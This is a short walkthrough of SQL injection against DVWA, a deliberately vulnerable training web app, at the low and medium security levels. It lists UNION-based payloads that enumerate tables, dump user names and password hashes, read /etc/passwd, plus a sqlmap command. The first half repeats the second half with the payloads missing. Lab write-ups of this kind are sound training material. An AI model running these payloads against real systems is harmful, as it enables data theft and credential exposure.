HOWTO : DVWA SQL Injection
Security level = low
- will display all the records
- will display "The used SELECT statements have a different number of columns" error message
- no error message but display all records
- no error message but display all records
- will display the version of MySQL and the database name - dvwa
or
- will display the current user of the database
- will display all the table names
- will display the users table column list
- we are looking for users table's first_name and password
- will display the mysql directory
- will display the content of /etc/passwd
Security level = medium
- will display all the records
- will display "The used SELECT statements have a different number of columns" error message
- no error message but display all records
- no error message but display all records
- will display the version of MySQL and the database name - dvwa
or
- will display the current user of the database
- will display all the table names
- since where clause cannot be used, all column name should be listed
or
- where 0x7573657273 is Hex value of "users"
- we are looking for users table's first_name and password
- will display the mysql directory
sqlmap for Security = low
For Security = medium is similar.
That's all! See you!
99 or 1=1 - will display all the records
99 or 1=1 union select 1,2,3- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2- no error message but display all records
99 or 1=1 union select null,null- no error message but display all records
99 or 1=1 union select version(),database()- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()or
99 or 1=1 union select user(), null- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'- will display the users table column list
99 or 1=1 union select null, concat(first_name,0x0a,password) from users- we are looking for users table's first_name and password
99 or 1=1 union select null,@@datadir- will display the mysql directory
99 or 1=1 union all select null,load_file('/etc/passwd')- will display the content of /etc/passwd
Security level = medium
99 or 1=1 - will display all the records
99 or 1=1 union select 1,2,3- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2- no error message but display all records
99 or 1=1 union select null,null- no error message but display all records
99 or 1=1 union select version(),database()- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()or
99 or 1=1 union select user(), null- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns- since where clause cannot be used, all column name should be listed
or
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273- where 0x7573657273 is Hex value of "users"
99 or 1=1 union select null, concat(first_name,0x0a,password) from users- we are looking for users table's first_name and password
99 or 1=1 union select null,@@datadir- will display the mysql directory
sqlmap for Security = low
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columnsFor Security = medium is similar.
That's all! See you!